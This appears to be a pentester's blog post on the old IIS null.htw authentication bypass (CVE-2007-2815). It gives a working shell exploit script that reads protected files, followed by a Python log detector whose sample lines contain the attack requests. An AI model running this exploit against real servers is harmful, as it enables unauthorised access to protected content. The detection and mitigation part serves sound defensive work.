My boundary between the monotonous and adventure...

Mauro

While pentesting a web server I ran into an old problem I was not aware of, so in this post I am documenting for myself the information for exploiting the problem.

Microsoft IIS NTLM and basic auth bypass
You can protect your web contents by adding NTFS ACLs, then you will be secure.
But you can protect your web contents by the Internet Information basic/NTLM authentication, then this will be bypassed with the null.htw object.

Both authentications seem to be the same, but really the null.htw object lets users get any file in the web directory; only if it is protected by the filesystem will it be secure.

In the exploit you can see how to use the null.htw object.

Code:


#!/bin/sh
#
# NTLM && BASIC AUTH BYPASS :)
#
# sha0[at]badchecksum.net
# Based on my adv: http://www.securityfocus.com/bid/24105/info
# (CVE-2007-2815)

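# Require exactly two arguments: the site base URL and the protected object path.
if [ $# -ne 2 ]
then
    printf "USAGE:\t\t%s <site> <protectedObject>\nExample:\t%s http://www.microsoft.com /en/us/default.aspx\n\n" "$0" "$0"
    exit 0
fi

site=$1
protectedObject=$2
# The query string must stay on a single line.
variabledatos="$site/shao/null.htw?CiWebhitsfile=$protectedObject&CiRestriction=b&CiHiliteType=full"
lynx -dump "$variabledatos"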



Source: badchecksum.net
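
On the defensive side, requests of this shape stand out in IIS W3C extended logs. The following is an added example, not part of the original post or the advisory: it parses log lines using the `#Fields` directive and flags requests to a `.htw` object whose `CiWebhitsFile` parameter names a file, noting whether the request was anonymous and whether it was served. The function names and the sample log are constructed for illustration.

```python
"""Flag Webhits (.htw) requests carrying CiWebhitsFile in IIS W3C logs."""
from urllib.parse import parse_qs

# Constructed sample log (not taken from a real server).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status
2007-05-23 10:01:02 192.0.2.10 - GET /index.htm - 200
2007-05-23 10:01:09 192.0.2.10 - GET /private/report.asp - 401
2007-05-23 10:01:15 192.0.2.10 - GET /x/null.htw CiWebhitsFile=/private/report.asp&CiRestriction=b&CiHiliteType=full 200
2007-05-23 10:02:40 192.0.2.77 alice GET /private/report.asp - 200
2007-05-23 10:03:11 192.0.2.10 - GET /y/NULL.HTW ciwebhitsfile=/private/web.config&CiRestriction=b 404
"""


def parse_w3c(text):
    """Yield one dict per request line, keyed by the active #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def find_htw_reads(text):
    """Return one finding per .htw request whose query names a target file."""
    findings = []
    for row in parse_w3c(text):
        if not row.get("cs-uri-stem", "").lower().endswith(".htw"):
            continue
        # Lower-case parameter names so casing variants are not missed.
        query = {k.lower(): v[0] for k, v in parse_qs(row.get("cs-uri-query", "")).items()}
        target = query.get("ciwebhitsfile")
        if target is None:
            continue
        findings.append({
            "client": row.get("c-ip"),
            "target": target,
            "anonymous": row.get("cs-username", "-") == "-",
            "served": row.get("sc-status") == "200",
        })
    return findings


if __name__ == "__main__":
    for finding in find_htw_reads(SAMPLE_LOG):
        print(finding)
```

A finding that is both anonymous and served, for a target that returns 401 when requested directly, is the case the advisory describes; per the advisory, NTFS ACLs on the content are what close it.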